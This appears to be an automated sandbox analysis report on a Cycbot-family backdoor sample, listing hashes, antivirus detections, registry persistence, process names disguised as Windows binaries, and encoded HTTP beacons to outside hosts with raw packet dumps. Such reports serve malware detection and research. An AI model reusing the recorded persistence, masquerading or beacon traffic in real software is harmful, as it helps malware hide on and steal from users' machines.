Analysis Date2014-06-16 05:12:48
MD5f6f0f23c1c7cc441e8dce085291cdbf2
SHA14e7dffc035687e98c92a9b8a4b9471b0f3858ba8

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: e07918ba21256047bdfa6318674d956a sha1: 0bde0e87612a514c9bffae9b103610eb35f0e56b size: 112128
Section.rdata md5: cc6d7006d2b8cb879459e355e8e4b640 sha1: b5927f0f5662e43ce7cf4c782b50bfad64dd7250 size: 1536
Section.data md5: 5cad8a10347f84dabd204ff4ca606bce sha1: 44c92dbb493e2d1f807c984f71829589c9b75ea3 size: 63488
Section.imul md5: b5d0407b9fadfe0e67ce92ea6f18c3b4 sha1: 83f01c7e09312140546d28ac2facc9a77758820d size: 1024
Timestamp2005-10-11 09:17:22
VersionProductVersion: 1.0.0.3
FileVersion: 1.0.0.3
PrivateBuild: 1518
PEhash58975bd8a3b0124bd34603c8ac550b086827ebcf
IMPhashf0eeb7a340d3b4df793aeee4019dd618
AV360 SafeTrojan.Generic.KDV.151105
AVAd-AwareTrojan.Generic.KDV.151105
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)BDS/Gbot.aida
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Cycbot-1450
AVDr. WebTrojan.Packed.21587
AVEmsisoftTrojan.Generic.KDV.151105
AVEset (nod32)Win32/Kryptik.LOJ
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureTrojan.Generic.KDV.151105
AVGrisoft (avg)Cryptic.CIX
AVIkarusTrojan.Crypt
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Trojan.Generic.KDV.151105
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSordersmallcd.com
Winsock DNS127.0.0.1
Winsock DNShollandandbarrett.com
Winsock DNShappyaladdin.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNShollandandbarrett.com
Type: A
213.62.84.113
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSordersmallcd.com
Type: A
DNShappyaladdin.com
Type: A
HTTP GEThttp://hollandandbarrett.com/images/footer/account.jpg?v14=29&tq=gKZEtzyrgQJ0ePdEPcZng958CxUMtdEblJH98MlrYFTW2MY7vou46DrezbgHa5CqfnHsdeT5k%2BUU7BqrlyMvkani88Iy5C7Fz21VR1v%2BMhUV2Xd86h6zls1xl8S0Re5VqeXfh7BhZYaCt04V1cCtFfcz3DH1r2CBLH1zUWQLSKwDqCCfeNqFNdmP55ufNzfyfaZ4ywmk%2Fec%2F1nEB%2Bb7iENZu0GRYB7YQs9KXDwJTo%2BneUNGkcu9tyX%2B3uT2IP41C8ZP4Q%2BCAWRZKRaPvAu4NfidT
User-Agent: mozilla/2.0
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfNtX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 213.62.84.113:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.182:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 666f6f74   GET /images/foot
0x00000010 (00016)   65722f61 63636f75 6e742e6a 70673f76   er/account.jpg?v
0x00000020 (00032)   31343d32 39267471 3d674b5a 45747a79   14=29&tq=gKZEtzy
0x00000030 (00048)   7267514a 30655064 4550635a 6e673935   rgQJ0ePdEPcZng95
0x00000040 (00064)   38437855 4d746445 626c4a48 39384d6c   8CxUMtdEblJH98Ml
0x00000050 (00080)   72594654 57324d59 37766f75 34364472   rYFTW2MY7vou46Dr
0x00000060 (00096)   657a6267 48613543 71666e48 73646554   ezbgHa5CqfnHsdeT
0x00000070 (00112)   356b2532 42555537 4271726c 794d766b   5k%2BUU7BqrlyMvk
0x00000080 (00128)   616e6938 38497935 4337467a 32315652   ani88Iy5C7Fz21VR
0x00000090 (00144)   31762532 424d6855 56325864 38366836   1v%2BMhUV2Xd86h6
0x000000a0 (00160)   7a6c7331 786c3853 30526535 56716558   zls1xl8S0Re5VqeX
0x000000b0 (00176)   66683742 685a5961 43743034 56316343   fh7BhZYaCt04V1cC
0x000000c0 (00192)   74466663 7a334448 31723243 424c4831   tFfcz3DH1r2CBLH1
0x000000d0 (00208)   7a555751 4c534b77 44714343 66654e71   zUWQLSKwDqCCfeNq
0x000000e0 (00224)   464e646d 50353575 664e7a66 7966615a   FNdmP55ufNzfyfaZ
0x000000f0 (00240)   3479776d 6b253246 65632532 46316e45   4ywmk%2Fec%2F1nE
0x00000100 (00256)   42253242 62376945 4e5a7530 47525942   B%2Bb7iENZu0GRYB
0x00000110 (00272)   37595173 394b5844 774a546f 2532426e   7YQs9KXDwJTo%2Bn
0x00000120 (00288)   65554e47 6b637539 74795825 32423375   eUNGkcu9tyX%2B3u
0x00000130 (00304)   54324950 34314338 5a503451 25324243   T2IP41C8ZP4Q%2BC
0x00000140 (00320)   4157525a 4b526150 76417534 4e666964   AWRZKRaPvAu4Nfid
0x00000150 (00336)   54204854 54502f31 2e300d0a 436f6e6e   T HTTP/1.0..Conn
0x00000160 (00352)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000170 (00368)   6f73743a 20686f6c 6c616e64 616e6462   ost: hollandandb
0x00000180 (00384)   61727265 74742e63 6f6d0d0a 41636365   arrett.com..Acce
0x00000190 (00400)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x000001a0 (00416)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x000001b0 (00432)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a31 2e300d0a 436f6e6e   ose....1.0..Conn
0x00000160 (00352)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000170 (00368)   6f73743a 20686f6c 6c616e64 616e6462   ost: hollandandb
0x00000180 (00384)   61727265 74742e63 6f6d0d0a 41636365   arrett.com..Acce
0x00000190 (00400)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x000001a0 (00416)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x000001b0 (00432)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a31 2e300d0a 436f6e6e   ose....1.0..Conn
0x00000160 (00352)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000170 (00368)   6f73743a 20686f6c 6c616e64 616e6462   ost: hollandandb
0x00000180 (00384)   61727265 74742e63 6f6d0d0a 41636365   arrett.com..Acce
0x00000190 (00400)   70743a20 2a2f2a0d 0a557365 722d4167   pt: */*..User-Ag
0x000001a0 (00416)   656e743a 206d6f7a 696c6c61 2f322e30   ent: mozilla/2.0
0x000001b0 (00432)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4e745825 32425039 68253242 49307344   NtX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
`w4.........$.
....-......[...
,.M.<.
.
U...
...
!.5.C...z
65.
.
i......Vo.t
.qv.s.....\v
0.0.b..t.J..(..5..S
.)...v..
.+.
7.l
..n
.R
|
.<
.
040904b0
1.0.0.3
1518
1!A 
 2ec
@3EA
c%B2
E0F0s
eB0&
%egr#
Fg`p
FileVersion
!G%p
p0CR
@PAE
PrivateBuild
ProductVersion
Q# `
qr!A
Q@%S
SC&D
SP#s
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
2?D2QJ
2K`-o~
32=^6w
!4A|?D
4R1OBu
*6k4Mh
6~YTIH4is
7?G;Tw
,7k.i!
87hl<6
a,20Ka
	a[qV"
]ARVz@
!A};t*
^AVCqA_
bA7D!fT
BDUi}fS
b,-&"s#
c4dJ?8-
C5pp*rhR
CompareStringA
ConvertFiberToThread
@.data
%dbN@n97
d'c6&re/Z
DestroyWindow
di]a<=
	d=K!u
dRH0K|
}ea?(%iy
Ef7Q5$Z
EnableWindow
EnumResourceNamesW
eorlvz=
eQ^uVU
ExcludeUpdateRgn
f_'fQ*
FileTimeToLocalFileTime
FileTimeToSystemTime
FindClose
FindFirstFileW
FindNextFileW
FindResourceW
FlashWindow
}/f^$O
f&$O['
f%Q3A&x
FreeLibrary
FxFGa\
g1<Y!_
GetCapture
GetCurrentProcess
GetLocalTime
GetOEMCP
GetShortPathNameW
GetStringTypeW
GetSystemDirectoryW
GetUpdateRgn
g!KO)JR8
$g@saPh
!#hFy3.m
<I4=`M
icAF	7"Y
InvalidateRgn
]I_O~V
IsBadReadPtr
IsWindow
IsWindowEnabled
i$W4Qz
I[Z]\K
_=J(4c
|j+|Cx
J,F3&L
J.g]d_
J.	i.Ow
jI[R&L
jQ|hC#
jrX0I*
KERNEL32.dll
KQ'wcR[
LCMapStringW
Li:;KEn
LoadResource
LocalAlloc
LocalFileTimeToFileTime
LocalFree
&:M^-aI
MI]vXhO
Ms3y94]
.\m	UE
MYV\ &ix
N+B-Ud3H/
N& jP^
n`L	$gk
n,wxyl
NzM^	nW
o0[fXp
O+75SP
OTBM`\
oy)z	e
p2h4;)
p{^?@x
Q eE|Z
qkF&o^ZD,
qU5A2x
:qxaK/
~r1rF4
r!<cS\
`.rdata
RealGetWindowClassA
RegisterWaitForSingleObject
ReleaseCapture
Rich`x
rI*-GP
r~Tn0	
'!RUqO
ry*MQM
+_~rzJz
s|0mh8~
SearchPathW
SetCapture
SetCurrentDirectoryW
SetEnvironmentVariableW
SetErrorMode
SetThreadIdealProcessor
sm#Mo	
SystemTimeToFileTime
T_F/@>G
{tg\lm
!This program cannot be run in DOS mode.
t>jL+}
TW>U(8=I
u_)@<7
#U<@7/
UpdateWindow
u&QVnC
USER32.dll
uw,U{~4
ValidateRect
ValidateRgn
v@At}C
{>^[>Vxe"
w}:!h4
~w[S7s6
ws{Uhc
X_7u_i
x-<*m+Q
&xN,[%o
xSAm[%S~q
y9'V,8
\$Y!?i
Yie	#R
YJ;TM}
yLh=M,
z2}G_{E
z3cVYJb
:ZOs>Feo